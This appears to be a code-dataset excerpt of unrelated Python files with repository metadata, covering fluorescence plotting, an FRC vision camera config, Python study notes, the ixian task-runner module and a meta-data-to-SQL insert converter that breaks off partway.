num = 9
ones = boxcar(num)/num
result = np.abs(np.convolve(data, ones, mode='same'))
return np.interp(result, (result.min(), result.max()), (0, 100))
def shift(data):
"""
firstIndex = 200
index = np.argmax(data)
if index < firstIndex:
data = np.insert(data, 0, np.zeros(
firstIndex-index))[:-(firstIndex-index)]
elif index > firstIndex:
data = data[index-firstIndex:]
data = np.insert(data, len(data)-1, np.zeros(index-firstIndex))
"""
# Stretch
secondIndex = 400
indexes = find_peaks_cwt(data, np.arange(1, 100))
# find max of indexes
peaks = data[indexes]
secondMax = 0
lastPeak = 0
for x in range(len(peaks)):
if peaks[x] < 95.0:
if peaks[x] > lastPeak:
lastPeak = peaks[x]
secondMax = x
secondMaxIndex = indexes[secondMax]
difference = secondIndex-secondMaxIndex
ratio = secondIndex/(secondIndex-difference)
old_x = np.linspace(0, int(len(data))-1, int(len(data)))
new_x = np.linspace(0, int(len(data))-1, int(len(data)*ratio))
new_data = np.interp(new_x, old_x, data)
return new_data, np.linspace(0, int(len(new_x))-1, int(len(new_x)))
fig, axes = plt.subplots(figsize=(8, 6))
filterData = filterDat(ctl[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="Control", color='black')
axes.fill_between(x, y, alpha=0.3)
"""filterData = filterDat(hr_4[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="4 hour")
axes.fill_between(x, y, alpha=0.3)
filterData = filterDat(hr_8[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="8 hour")
axes.fill_between(x, y, alpha=0.3)
"""
filterData = filterDat(hr_24[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="24 hour", color='maroon')
axes.fill_between(x, y, alpha=0.3)
axes.legend()
axes.set_ylabel('% of Max')
axes.set_xlabel('Fluorescence')
axes.set_xlim((0, 800))
plt.show()
| 27.863158 | 71 | 0.659615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 846 | 0.319607 |
d34a4e09e20dab066492b8968362434dac01a5d1 | 3,349 | py | Python | config.py | sneakysnakesfrc/sneaky-vision-2019 | 7a83ece2c76c084e077bb386ac234594c3d780c5 | [
"MIT"
] | 2 | 2020-10-07T21:17:48.000Z | 2020-11-13T13:45:20.000Z | config.py | sneakysnakesfrc/sneaky-vision-2019 | 7a83ece2c76c084e077bb386ac234594c3d780c5 | [
"MIT"
] | null | null | null | config.py | sneakysnakesfrc/sneaky-vision-2019 | 7a83ece2c76c084e077bb386ac234594c3d780c5 | [
"MIT"
] | 1 | 2020-11-13T13:45:21.000Z | 2020-11-13T13:45:21.000Z | # Debug or not
DEBUG = 1
# Trackbar or not
CREATE_TRACKBARS = 1
# Display or not
DISPLAY = 1
# Image or Video, if "Video" is given as argument, program will use cv2.VideoCapture
# If "Image" argument is given the program will use cv2.imread
imageType = "Video"
# imageType = "Image"
# Image/Video source 0 or 1 for webcam or the file path of the video source such as
# "images/rocket/RocketPanelStraightDark72in.jpg" or "images/rocket/testvideo.mp4"
imageSource = 0
# Ip address
ipAddress = "10.99.99.2"
# The script to make camera arrangements
osScript = "v4l2-ctl --device /dev/video0 -c auto_exposure=1 -c exposure_auto_priority=0 -c exposure_time_absolute=20 --set-fmt-video=width=160,height=120,pixelformat=MJPG -p 15 && v4l2-ctl -d1 --get-fmt-video"
# Call OS script or not, close this in WINDOWS
callOS = 1
# NetworkTable Name
networkTableName = "visiontable"
# Camera Properties
camera = { 'HFOV' : 53.50, # 80.0, Horizontal FOV of the camera, see camera datasheet
'VFOV' : 41.41, # 64.0, Vertical FOV of the camera, see camera datasheet
'Brightness' : 1, # Brightness of the image
'Contrast' : 1000, # Contrast of the image
'HeightDiff' : 15, # Height difference between camera and target
'MountAngle' : -5, # Mounting angle of the camera need minus sign if pointing downwards
'WidthSize' : 320, # Resized image width size in pixels (image becomes square)
'HeightSize' : 240, # Resized image height size in pixels (image becomes square)
'FPS' : 15, # FPS of the camera
'AngleAcc' : 360, # 5 is normally used, you can use 360 to let the code ignore accuracy
'SetSize' : 0, # Set size of the camera with cap prop
'DoCrop' : 0, # Crop the image or don't
'DoResize' : 1, # Resize the image or don't
'CropXLow' : 0, # Lowest Point in X axis to be cropped
'CropYLow' : 125, # Lowest Point in Y axis to be cropped
'ColorSpace' : 'HSV', # Which color space to use BGR, HSV or Gray
'Gray_low' : 127, # Lower Gray value to be filtered
'Gray_high' : 255, # Higher Gray value to be filtered
'H_low' : 13, # Lower Hue value to be filtered, 55
'H_high' : 255, # Higher Hue to be filtered
'S_low' : 25, # Lower Saturation to be filtered, 97
'S_high' : 255, # Higher Saturation to be filtered
'V_low' : 24, # Lower Value to be filtered, 177
'V_high' : 255, # Higher Value to be filtered
'B_low' : 5, # Lower Blue value to be filtered
'B_high' : 95, # Higher Blue value to be filtered
'G_low' : 135, # Lower Green value to be filtered
'G_high' : 255, # Higher Green value to be filtered
'R_low' : 121, # Lower Red value to be filtered
'R_high' : 181 # Higher Red value to be filtered
}
filter = { 'MinArea' : 200, # Minimum value of area filter in pixels
'MaxArea' : 5000 # Maximum value of area filter in pixels
}
| 57.741379 | 211 | 0.582263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,320 | 0.692744 |
d34ade69ec04997bfd82ad501ed25a0cde195b6d | 307 | py | Python | context/steps.py | NanoScaleDesign/Canparam | 987972f1593b83c3cbd8808b2722ff1b3a696eac | [
"MIT"
] | null | null | null | context/steps.py | NanoScaleDesign/Canparam | 987972f1593b83c3cbd8808b2722ff1b3a696eac | [
"MIT"
] | null | null | null | context/steps.py | NanoScaleDesign/Canparam | 987972f1593b83c3cbd8808b2722ff1b3a696eac | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
"""Context files must contain a 'main' function.
The return from the main function should be the resulting text"""
def main(params):
if hasattr(params,'time'):
# 1e6 steps per ns
steps = int(params.time * 1e6)
else:
steps = 10000
return steps
| 20.466667 | 65 | 0.635179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 161 | 0.52443 |
d34b8ae8f80579fd68134d835709ce8d49d3681c | 1,822 | py | Python | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | 1 | 2018-04-04T09:26:21.000Z | 2018-04-04T09:26:21.000Z | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | #-*-coding:utf-8-*-
#bodyBMI.py
#2018年4月11日 21:03:12
#打印出字符串中的某一部分
'''
import random
st = [1,1,15,1,5,8,1,5,8]
print (random.shuffle(st))
'''
'''
#利用蒙特卡洛方法计算圆周率PI
from random import random
from time import perf_counter
DATA = pow(1000,100)
hit = 0
start = perf_counter()
for i in range(1,DATA+1):
x,y = random(),random()
if pow((x**2)+(y**2),0.5)<=1:
hit+=1
PI = 4*(hit/DATA)
print("圆周率PI={}".format(PI))
print("程序运行时间={}".format(start-perf_counter()))
'''
'''
#利用函数定义计算N的阶乘
n = 10
sr = [1,2,5,23,92,14,20,1]
def fact(m=1):
global n
for i in range(1,n):
n*=i
return n//m
print(fact())
print("最大的是:{}\n最小的是:{}".format(max(sr),min(sr)))
'''
'''
#前期复习
sr = ['sa','ad']
print(''.join(sr))
'''
'''
#海龟进度条
import time
import turtle as t
t.setup(600,600,200,200)
t.pensize(12)
t.pencolor('red')
t.bk(100)
t.done()
'''
'''
try:
st = str(input())
print(st)
except:
print("error!")
else:
print("right")
finally:
print("end")
'''
'''
for i in range(1,10+1):
if i==8:
continue
print(i)
print('xx')
'''
#第五周函数学习
#可变参数学习
'''
def fact(n,*b):
s = 1
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s
print (fact(10,2,3,4))
'''
'''
s = 10
def fact(n,*b):
global s
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s,b
a,b = fact(10,2,3,4)
print (a,b)
'''
#局部变量为组合数据类型,且为创建,等同于全局变量。
'''
#eg1
ls = ['d','f']
def func(a):
ls.append(a)
return
func('c')
print(ls)
#eg2
ls = ['d','f']
def func(a):
ls = [] #重新定义了ls,使它被创建成为了局部变量。
ls.append(a)
return
func('c')
print(ls)
'''
'''
dc =lambda a,b : a+b=1 #错误写法,不能赋值
print(dc(10,12))
dc = lambda a,b : a+b #正确方式
print(dc(10,12))
'''
'''
#无参数值的。
dc = lambda :"武汉大学" #其中不能有打印函数
print(dc())
'''
| 12.565517 | 53 | 0.540615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,090 | 0.9803 |
d34b9b0c409e98b0bcb43c6a5a87a43c41b22c61 | 20,499 | py | Python | ixian/task.py | kreneskyp/ixian | 80133e9106e23eeb562c0112dd70bcdfb61986f9 | [
"Apache-2.0"
] | null | null | null | ixian/task.py | kreneskyp/ixian | 80133e9106e23eeb562c0112dd70bcdfb61986f9 | [
"Apache-2.0"
] | null | null | null | ixian/task.py | kreneskyp/ixian | 80133e9106e23eeb562c0112dd70bcdfb61986f9 | [
"Apache-2.0"
] | null | null | null | # Copyright [2018-2020] Peter Krenesky
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import typing
from ixian.check.checker import hash_object
from ixian.config import CONFIG
from ixian.exceptions import AlreadyComplete
from ixian.utils.color_codes import BOLD_WHITE, ENDC, GRAY, OK_GREEN
# Module-level logger used for task execution tracing.
logger = logging.getLogger(__name__)

# Global task registry: maps task name -> TaskRunner instance. Populated as a
# side effect of constructing TaskRunner objects (see TaskRunner.__init__).
TASKS = {}
class TaskRunner(object):
    """
    A task is a wrapper around functions that adds in various functionality
    such as dependencies and check functions.

    func - function to run
    category - category to add this task to
    check - list of checkers
    clean - clean before building
    config - list of relevant settings to display in task help
    name - name of this task
    short_description - short description for task
    description - long description for task
    parent - parent task (this task will be run first if it is run)
    children - tasks this task depends on (They will be run first)
    """

    # Class-level default; overwritten per-instance in __init__ when a
    # ``check`` argument is provided.
    checkers = None

    def __init__(
        self,
        task=None,
        func=None,
        category=None,
        check=None,
        clean=None,
        config=None,
        depends=None,
        name=None,
        parent=None,
        short_description=None,
        description=None,
    ):
        self.task = task
        self.func = func
        self._depends = depends or []
        self.category = category.upper() if category else None
        self.clean = clean
        self.short_description = short_description or ""
        self.config = config

        # determine task name
        # NOTE(review): when ``name`` is None, ``self.name`` is never assigned
        # here and the registry lookup below would raise AttributeError --
        # confirm all callers supply a name (Task.__new__ passes instance.name).
        if name is not None:
            self.name = name

        # determine description
        self.description = description

        # Add task to global registry. Merge virtual target's dependencies if they exist.
        if self.name in TASKS:
            task_instance = TASKS[self.name]
            # The task is virtual if there is no func, replace it.
            if task_instance.func is None:
                # absorb the placeholder's dependencies, then take its slot
                self.add_dependency(*task_instance._depends)
                task_instance = self
            else:
                # duplicate concrete definition: keep the first, warn only
                logger.warning("Duplicate task definition: {}".format(self.name))
        else:
            task_instance = self
        TASKS[self.name] = task_instance

        # add task to VirtualTargets if a parent is specified
        if parent:
            for parent in parent if isinstance(parent, list) else [parent]:
                self.add_to_parent(parent)

        # Setup checkers, clean method
        if check:
            if isinstance(check, (list, tuple)):
                self.checkers = check
            else:
                self.checkers = [check]

    def __str__(self):
        return f"<{type(self).__name__}@{id(self)} func={self.name}>"

    # NOTE(review): Python 2 leftover; harmless on Python 3 but unused there.
    def __unicode__(self):
        return f"<{type(self).__name__}@{id(self)} func={self.name}>"

    def __repr__(self):
        return f"<{type(self).__name__}@{id(self)} func={self.name}>"

    @property
    def in_context(self):
        """Whether the wrapped Task is enabled for the current run context.

        ``Task.contexts is True`` acts as a wildcard ("all contexts").
        """
        if not self.task:
            return False
        return self.task.contexts is True or CONFIG.RUN_CONTEXT in self.task.contexts

    def add_to_parent(self, name: str):
        """Add a task to as a dependency of a another task.

        This is a grouping method that allows modules to inject
        dependencies into common targets.

        If the target task is not defined a no-op task will be created to wrap
        the added tasks.

        :param name: name of parent task to add task to
        :return: parent task
        """
        try:
            parent = TASKS[name]
        except KeyError:
            # VirtualTarget wasn't defined explicitly, or task hasn't been loaded yet.
            # create a TaskRunner for the target. If an explicit task is loaded after
            # it will replace this and assume the children that were already added.
            parent = TaskRunner(name=name)
            TASKS[name] = parent
        parent.add_dependency(self)
        return parent

    def __call__(self, *args, **kwargs):
        # args is forwarded as a single tuple; execute() expects it that way.
        return self.execute(args, **kwargs)

    def execute(self, args, **kwargs):
        """Execute this task.

        Executes this task including any dependencies that fail their checks.
        If a dependency fails it's check then this task will execute even if
        it's own checks pass.

        Tasks and dependencies may be forced by passing `force=True` or
        `force_all=True` as kwargs.

        Tasks and dependency clean methods may be run by passing `clean=True`
        or `clean_all=True` as kwargs. Clean implies `force=True`.

        :param args: args to pass through to the task
        :param kwargs: options for task execution
        :return: return value from task function
        """
        clean_root = kwargs.get("clean", False)
        clean_all = kwargs.pop("clean_all", False)
        force_root = kwargs.pop("force", False)
        force_all = kwargs.pop("force_all", False)

        # flag implications: clean => force; *_all => root flag as well
        if clean_root:
            force_root = True
        if clean_all:
            clean_root = True
            force_all = True
        if force_all:
            force_root = True

        # save force to task instance so it may be referenced downstream
        # TODO: this should be passing in `force`
        # NOTE(review): as written this sets force=True unconditionally,
        # regardless of the computed force_root -- see the TODO above.
        self.force = True

        args_as_str = CONFIG.format(" ".join([str(arg) for arg in args]))
        logger.debug(f"[exec] {self.name}({args_as_str}) force={force_root} clean={clean_root}")

        def execute_node(node, clean, force, args=None):
            # Depth-first execution of the (flattened) dependency tree.
            runner = TASKS[node["name"]]
            if runner and runner.clean and clean:
                logger.debug(f"Cleaning Task: {runner.clean}")
                runner.clean()

            complete_dependencies = 0
            for dependency in node["dependencies"]:
                try:
                    # NOTE(review): children receive the *_all flags, so plain
                    # clean/force only apply to the root node by design.
                    execute_node(dependency, clean_all, force_all)
                except AlreadyComplete:
                    complete_dependencies += 1
            dependencies_complete = complete_dependencies == len(node["dependencies"])

            # Execute function if there is one. Targets may not have a function. If any dependency
            # was run, then this task must run too.
            if runner and runner.func:
                passes, checkers = runner.check(force)
                if dependencies_complete and passes:
                    logger.debug(f"[skip] {node['name']}, already complete.")
                    raise AlreadyComplete()
                else:
                    # set tasks force attribute so it's setup the same as if it were run directly.
                    runner.task.__task__.force = force
                    return_value = runner.func(*args or [])

                    # save checker only after function has completed successfully. Save should be
                    # called even if force=True
                    if checkers:
                        for checker in checkers:
                            checker.save()
                    logger.debug(f"[fini] {runner.name}")
                    return return_value

        return execute_node(self.tree(flatten=False), clean_root, force_root, args)

    def check(self, force: bool = False) -> (bool, list):
        """Return True if the task is complete based on configured checks.

        If the task does not have a checker this method always returns `False`.

        :param force: override the check and return True if True.
        :return: (passes, cloned checkers) -- checkers is None when the task
            has no checkers configured.
        """
        # clone so check()/save() work on fresh state, not shared instances
        checkers = [checker.clone() for checker in self.checkers] if self.checkers else None
        passes = False
        if self.checkers:
            if force:
                passes = False
            else:
                checks = [checker.check() for checker in checkers]
                passes = all(checks)
        return passes, checkers

    def state(self, shallow: bool = True) -> typing.Optional[dict]:
        """
        Calculates a dict of state generated from the tasks checkers.

        :param shallow: only return hash for dependencies
        :return: dict of state returned from checkers
        """
        # NOTE(review): ``self.depends`` is a property that always returns a
        # list, so this early-return is effectively dead; additionally, when
        # checkers is None the "checks" comprehension below would raise
        # TypeError -- confirm callers only invoke state() on checked tasks.
        if self.checkers is None and self.depends is None:
            return None

        # only checkers that opt in contribute to the task's state hash
        checkers = (
            [checker.clone() for checker in self.checkers if checker.contribute_to_task_state]
            if self.checkers
            else None
        )

        depends = {}
        for dependency in self.depends:
            name = dependency.name
            if shallow:
                depends[name] = dependency.hash()
            else:
                depends[name] = dependency.state()

        return {
            "depends": depends,
            "checks": [
                {
                    "class": f"{type(checker).__module__}.{type(checker).__name__}",
                    "state": checker.state(),
                }
                for checker in checkers
            ],
        }

    def hash(self):
        """Stable hash of this task's shallow state (see ``state``)."""
        return hash_object(self.state(shallow=True))

    def add_dependency(self, *tasks):
        """Append one or more tasks (runners or name strings) as dependencies."""
        self._depends.extend(tasks)

    @property
    def depends(self) -> list:
        # Resolve name strings (possibly containing {CONFIG} placeholders)
        # into TaskRunner instances at access time.
        return [
            dependency if isinstance(dependency, TaskRunner) else TASKS[CONFIG.format(dependency)]
            for dependency in self._depends
        ]

    def render_help(self, buffer) -> None:
        """render the "help" command

        Renders ixian internal help for the task. This help should explain
        how to use the task via ixian.

        Many tasks are proxies to other tools (e.g. npm, pipenv, etc). This
        help shouldn't try to replace that. Proxy tasks should indicate as such
        and include an example how to reach the tool's built-in help (--help)

        combines:
        - Name of task
        - Docstring as length description
        - task status tree
        """
        from ixian.config import CONFIG

        buffer.write(BOLD_WHITE)
        buffer.write("NAME\n")
        buffer.write(ENDC)
        buffer.write(f" {self.name} -- {self.short_description}\n")
        buffer.write(BOLD_WHITE)
        buffer.write("\nDESCRIPTION\n")
        buffer.write(ENDC)
        if self.description:
            buffer.write(CONFIG.format(self.description))
        if self.config:
            buffer.write(BOLD_WHITE)
            buffer.write("\nCONFIGURATION\n")
            buffer.write(ENDC)
            # NOTE(review): assumes entries look like "{KEY}"; config[1:-1]
            # strips the surrounding braces and padding aligns the values.
            padding = max(len(config) for config in self.config) - 1
            for config in self.config:
                buffer.write(
                    " - {key} {value}\n".format(
                        key="{key}:".format(key=config[1:-1]).ljust(padding),
                        value=CONFIG.format(config),
                    )
                )
        buffer.write(BOLD_WHITE)
        buffer.write("\n\nSTATUS\n")
        buffer.write(ENDC)
        self.render_status(buffer)

    def render_status(self, buffer) -> None:
        """render task status.

        Display the dependency tree for the task.

        Formatting/Readability optimizations:
        - Tree trimming: Redundant nodes are trimmed from the status tree.
          If A and B both depend on C then C will only be shown once.
        """

        def render_task(node, indent=0):
            # render task status
            if node["name"] is not None:
                passes = node["passes"]
                if passes:
                    icon = OK_GREEN + "✔" + ENDC
                else:
                    icon = GRAY + "○" + ENDC
                if indent:
                    spacer = " " * indent
                else:
                    spacer = ""
                task_line = f'{spacer}{icon} {node["name"]}\n'
                buffer.write(task_line)
                indent += 2
            for dependency in node["dependencies"]:
                render_task(dependency, indent=indent)

        render_task(self.status(), indent=0)

    def tree(self, dedupe: bool = True, flatten: bool = True) -> dict:
        """
        Return tree of tasks, with this task as the root.

        :param dedupe: remove duplicates from tree
        :param flatten: flatten single item dependcy lists into the parent
        :return: tree of {"name": ..., "dependencies": [...]} nodes
        """
        tree = self._build_tree(set([]) if dedupe else None)
        if flatten:
            tree = flatten_tree(tree)
        return tree

    def _build_tree(self, seen=None):
        """
        Internal method for recursively building task tree

        :param seen: should be a Set if deduping.
        :return: node in tree
        """
        dependencies = []
        for dependency in self.depends:
            if seen is not None:
                if dependency in seen:
                    continue
                seen.add(dependency)
            dependencies.append(dependency._build_tree(seen))
        return {"name": self.name, "dependencies": dependencies}

    def status(self, dedupe: bool = True, flatten: bool = True) -> dict:
        """
        Return the task tree augmented with status information
        """

        def update(node):
            # post-order: children are annotated before the parent reads them
            for dependency in node["dependencies"]:
                update(dependency)
            if node["name"] is not None:
                # Run self.check even if children fail their checks. That way the
                # checkers (and state) are available.
                children_passes = all(
                    (dependency["passes"] for dependency in node["dependencies"])
                )
                runner = TASKS[node["name"]]
                passes, checkers = runner.check()
                node["checkers"] = checkers
                # node fails if any children have failed
                node["passes"] = passes and children_passes
            return node

        return update(self.tree(dedupe, flatten))
def flatten_tree(tree: dict, full: bool = False) -> dict:
    """
    Flatten an execution tree to make it easier to read.

    Task trees are often a single node nested several levels deep. Such chains
    are collapsed into a list: execution order is unchanged, but the result is
    easier for a human to scan.

    Before:
        - foo
          - bar
            - xoo
    After:
        - xoo
        - bar
        - foo

    Nodes with multiple dependencies are kept as branch points unless ``full``
    is set, in which case everything is collapsed into one list.

    :param tree: Tree to flatten
    :param full: Flatten tree into single list
    :return: flattened task list
    """

    def _collapse(node: dict) -> list:
        """Flatten one node; always returns a list for a uniform shape."""
        clone = dict(node)
        deps = clone["dependencies"]
        if not deps:
            # leaf: nothing to flatten
            return [clone]
        if full or len(deps) == 1:
            # collapse into a single list: dependencies first, then this node
            chain = []
            for child in deps:
                chain.extend(_collapse(child))
            clone["dependencies"] = []
            chain.append(clone)
            return chain
        # branch point (not full): keep this node, but merge each child's
        # flattened form into the dependency list
        merged = []
        for child in deps:
            merged.extend(_collapse(child))
        clone["dependencies"] = merged
        return [clone]

    chain = _collapse(tree)
    if len(chain) == 1:
        # single node: unpack and return it as the root
        return chain[0]
    # the root itself was collapsed into the list; wrap everything in a
    # synthetic root so downstream consumers see a consistent node shape
    return {"name": None, "dependencies": chain}
class Task(object):
    """
    Super class for defining ixian tasks.

    Task subclasses should define an execute method. Instantiating a subclass
    registers it (via TaskRunner) in the global TASKS registry as a side
    effect of __new__.
    """

    # TaskRunner wrapper, created on first instantiation of the subclass.
    __task__ = None
    # Run contexts this task is enabled in; True acts as a wildcard.
    contexts = ["cli"]

    @property
    def __func__(self):
        """Return a closure around ``self.execute`` for the TaskRunner."""
        if not hasattr(self, "execute"):
            raise NotImplementedError("Task classes must implement execute method")

        # wrap execute method to curry `self`
        def execute(*args, **kwargs):
            return self.execute(*args, **kwargs)

        return execute

    def __new__(cls, *args, **kwargs):
        # NOTE(review): forwarding *args/**kwargs to object.__new__ raises
        # TypeError on Python 3 when extra args are given -- confirm subclasses
        # are always instantiated with no arguments.
        instance = super(Task, cls).__new__(cls, *args, **kwargs)

        # TODO: fix needed, for broken tests this causes
        # if instance.name not in TASKS:
        # NOTE(review): the condition below is a *chained comparison*:
        # it evaluates as ``(cls.__task__ is None) and (None not in TASKS)``.
        # Since TASKS is keyed by name strings, the second clause is normally
        # True, so in practice this is just ``cls.__task__ is None``. Left
        # as-is deliberately (see TODO above).
        if cls.__task__ is None not in TASKS:
            cls.__task__ = TaskRunner(
                task=instance,
                func=instance.__func__,
                name=instance.name,
                category=getattr(instance, "category", None),
                depends=getattr(instance, "depends", None),
                check=getattr(instance, "check", None),
                clean=getattr(instance, "clean", None),
                config=getattr(instance, "config", None),
                parent=getattr(instance, "parent", None),
                short_description=getattr(instance, "short_description", None),
                description=cls.__doc__,
            )
        else:
            # In practice task classes should never need to be instantiated more than once.
            # Unloading tasks isn't supported at this time, but tests may do that. When that
            # happens subsequent tests may see this fail. This msg helps show that happened.
            # hopefully this is fixed in a better way when task loading/tree is refactored.
            logger.warning(f"Task {instance.name} instantiated but an instance already exists")

        return instance

    def __call__(self, *args, **kwargs):
        # delegate to the class-level TaskRunner so dependencies/checks run
        type(self).__task__(*args, **kwargs)
class VirtualTarget(Task):
    """
    A virtual target is a placeholder task that is used for targets that
    don't have a concrete task registered. VirtualTargets may be executed the
    same as tasks. When run, they execute dependencies that were registered
    with them.

    VirtualTargets allow the target to be given a description, dependencies,
    and other options. VirtualTargets allow tasks grouping without tight
    coupling to a specific target.

    Tasks and other VirtualTargets register with another VirtualTarget by
    specifying the targets as it's parent. I.e. `parent='my_target'`.

    If multiple modules implement VirtualTargets with the same name, then they
    will be merged. This allows modules to define the same groupings.

    For example, javascript and python modules might both define a `test`
    target to encapsulate all tests. Build pipeline tools can be built to
    expect the generic `test` target regardless of whether a project use
    python, javascript, or any other combination of languages.

    If a concrete Task with the same name as VirtualTarget is registered, the
    Task will replace the VirtualTarget. Tasks that contribute to the virtual
    target act as dependencies, they'll run before any concrete task.
    """

    @property
    def __func__(self):
        # No function of its own: running a virtual target only runs its
        # registered dependencies (TaskRunner skips execution when func is None).
        return None
| 34.862245 | 98 | 0.592029 | 16,778 | 0.818319 | 0 | 0 | 752 | 0.036678 | 0 | 0 | 9,473 | 0.46203 |
d34d9ab7f21732e1b05d7bd300bd84ebde6c1a49 | 8,421 | py | Python | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 1 | 2016-09-25T16:41:57.000Z | 2016-09-25T16:41:57.000Z | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | null | null | null | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 2 | 2016-09-25T16:48:49.000Z | 2020-05-26T20:00:33.000Z | #!/usr/local/bin/bash
"""
Two options:
1) Build DB-specific data files from meta-data files
2) Build a single file containing all the DB-specific 'insert' statements in the correct dependency
order from meta-data files and XML table files
NOTE:
- The data files must be named "xxx.dat"; for option (2) the corresponding XML table file must be
"xxx.sql"
- For option (2), the data must be tab-separated
$Header: /home/inqwell/cvsroot/dev/scripts/python/meta_to_db_data.py,v 1.1 2009/05/22 22:15:44 sanderst Exp $
$Author: sanderst $
$DateTime: 2009/05/01 17:04:46 $
$Change: 165582 $
"""
import xml.etree.ElementTree as ET
from xml_to_db_utils import get_table_info
from xml_to_db_utils import get_table_creation_order
import xml_to_mysql_utils
import xml_to_oracle_utils
# Mapping from DB type to function taking a Xylinq name and returning its DB-compatible name.
# Keys must be lower-case: lookups use db_type.lower().
_name_func_by_db_type = {
    "mysql" : xml_to_mysql_utils.get_db_compatible_name,
    "oracle": xml_to_oracle_utils.get_db_compatible_name,
}

# Mapping from DB type to meta-data converter class (instantiated per call).
_meta_data_converter_cls_by_db_type = {
    "mysql" : xml_to_mysql_utils.MetaDataConverter,
    "oracle": xml_to_oracle_utils.MetaDataConverter,
}
def meta_data_text_to_db_data_text(meta_data_text, db_type):
    """
    Convert a meta-data text into a DB-specific data text.

    @param IN meta_data_text Meta-data text
    @param IN db_type        DB type (MySQL, Oracle, ...)

    @return A DB-specific data text
    """
    # Instantiate the converter registered for this DB type; an unknown type
    # surfaces as a KeyError which we translate into a friendlier error.
    try:
        converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
    except KeyError:
        raise Exception("DB type not supported: '%s'" % db_type)
    return converter.meta_to_db_text(meta_data_text)
def meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep=None):
    """
    Convert a list of meta-data texts (along with table info objects) into a text containing insert
    statement for a given database.

    @param IN info_and_data_list List of TableInfo object and meta-data text pairs
    @param IN db_type            DB type (MySQL, Oracle, ...)
    @param IN db_statement_sep   Separator to use for the insert statements; default: ";"

    @return The insert statements as a string
    """
    if db_statement_sep is None:
        db_statement_sep = ";"
    # Get the DB-specific functions/classes
    try:
        xy_to_db_name_func = _name_func_by_db_type[db_type.lower()]
        meta_data_converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
    except KeyError:
        raise Exception("DB type not supported: '%s'" % db_type)
    # Identify the order of insertion (dependency order from the table infos)
    info_and_data_by_table_name = dict([(item[0].name, item) for item in info_and_data_list])
    table_info_list = [item[0] for item in info_and_data_list]
    table_order = get_table_creation_order(table_info_list)
    # Process each table in the insertion order
    output_lines = []
    for table_name in table_order:
        table_info, meta_data_text = info_and_data_by_table_name[table_name]
        # Convert the meta-data in the data text
        db_data_text = meta_data_converter.meta_to_db_text(meta_data_text)
        # Get the DB table and column names
        db_table_name = xy_to_db_name_func(table_name)
        db_col_names = [xy_to_db_name_func(col_info.name) for col_info in table_info.columns]
        db_col_list_str = ", ".join(db_col_names)
        nb_col_names = len(db_col_names)
        # Process the data rows: tab-separated values, blank lines and lines
        # starting with "//" are skipped as comments
        rows = db_data_text.splitlines()
        for row in rows:
            row = row.strip()
            if not row or row.startswith("//"):
                continue
            values = row.split("\t")
            if len(values) != nb_col_names:
                raise Exception("Incorrect number of values (%d expected):\n%s" % (nb_col_names,
                                                                                   values))
            # values are assumed to already be SQL-formatted (quoted as needed)
            insert_statement = "INSERT INTO %s (%s) VALUES (%s)%s" % (
                db_table_name,
                db_col_list_str,
                ", ".join(values),
                db_statement_sep)
            output_lines.append(insert_statement)
    return "\n".join(output_lines)
def main():
    """CLI entry point.

    Two modes (Python 2 script):
    - data_files:  convert each meta-data *.dat file into a DB-specific data file
    - insert_file: combine meta-data + XML table files into one file of INSERT
      statements, ordered by table dependencies
    """
    import glob
    from optparse import OptionParser
    import os

    parser = OptionParser()
    parser.add_option("--mode", dest="mode", help="'data_files' or 'insert_file'")
    parser.add_option("--meta_data_dir", dest="meta_data_dir", help="Input directory for meta-data "
                      "files")
    parser.add_option("--xml_dirs", dest="xml_dirs", help="Input directories for XML table files; "
                      "'insert_file' mode only")
    parser.add_option("--out_dir", dest="output_dir", help="Output dir for data files; 'data_files'"
                      " mode only")
    parser.add_option("--out", dest="output_file", help="Output file for insert statements; "
                      "'insert_file' mode only")
    parser.add_option("--db", dest="db_type", help="DB type: MySQL, Oracle, ...")
    parser.add_option("--sep", dest="db_statement_sep", help="Separator for the insert statements; "
                      "'insert_file' mode only")
    options, dummy = parser.parse_args()
    # validate mandatory arguments common to both modes
    mode = options.mode
    if mode is None:
        raise Exception("Missing mandatory argument '--mode'")
    meta_data_dir = options.meta_data_dir
    if meta_data_dir is None:
        raise Exception("Missing mandatory argument '--meta_data_dir'")
    db_type = options.db_type
    if db_type is None:
        raise Exception("Missing mandatory argument '--db'")
    if mode == "data_files":
        output_dir = options.output_dir
        if output_dir is None:
            raise Exception("Missing mandatory argument '--out_dir'")
        meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
        for meta_data_file in meta_data_files:
